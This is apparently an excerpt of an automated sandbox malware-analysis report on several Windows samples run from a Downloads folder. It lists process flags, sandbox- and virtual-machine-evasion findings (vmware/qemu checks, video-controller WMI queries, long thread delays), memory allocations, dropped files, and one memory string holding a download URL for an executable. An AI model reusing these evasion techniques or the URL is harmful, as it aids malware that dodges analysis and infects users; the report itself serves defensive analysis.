                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Contain functionality to detect virtual machines
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: vmware qemu qemu 12_2_004011CB
                            Found evasive API chain (may stop execution after checking volume information)
                            Source: C:\Users\user\Downloads\haus\traf.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,Sleep
                            Source: C:\Users\user\Downloads\haus\sel1.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_12-226
                            Opens the same file many times (likely Sandbox evasion)
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeFile opened: \Device\RasAcd count: 45003
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\Downloads\haus\T.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F60000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTTP://FTP.YWXWW.NET:820/AUTORUNS.EXE
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: 4F80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Downloads\haus\vapo.exeMemory allocated: 550000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\vapo.exeMemory allocated: 1A370000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: A20000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: 2580000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\ABC.exeMemory allocated: 2390000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\T.exeMemory allocated: 680000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\T.exeMemory allocated: 2350000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\T.exeMemory allocated: 4350000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\conhost.exeMemory allocated: F10000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\conhost.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\conhost.exeMemory allocated: 4BD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 2D30000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 2F30000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 2D30000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 54E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 64E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 6610000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMemory allocated: 7610000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\Enalib.exeMemory allocated: 7E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\Enalib.exeMemory allocated: 2610000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\Enalib.exeMemory allocated: 2480000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\vapo.exeMemory allocated: 1150000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\vapo.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\haus\traf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03001904 rdtsc 16_2_03001904
                            Source: C:\Users\user\Downloads\haus\ABC.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Downloads\haus\vapo.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\T.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599766
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599631
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599469
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599319
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599203
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 599094
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598973
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598851
                            Source: C:\Users\user\Downloads\haus\conhost.exeThread delayed: delay time: 598688
                            Source: C:\Users\user\Downloads\haus\Enalib.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\vapo.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeWindow / User API: threadDelayed 9997
                            Source: C:\Users\user\Downloads\haus\vapo.exeWindow / User API: threadDelayed 4288
                            Source: C:\Users\user\Downloads\haus\T.exeWindow / User API: threadDelayed 6138
                            Source: C:\Users\user\Downloads\haus\conhost.exeWindow / User API: threadDelayed 835
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3241
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2640
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2311
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 496
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2116
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 430
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_asyncio.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\select.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24882\_hashlib.pydJump to dropped file
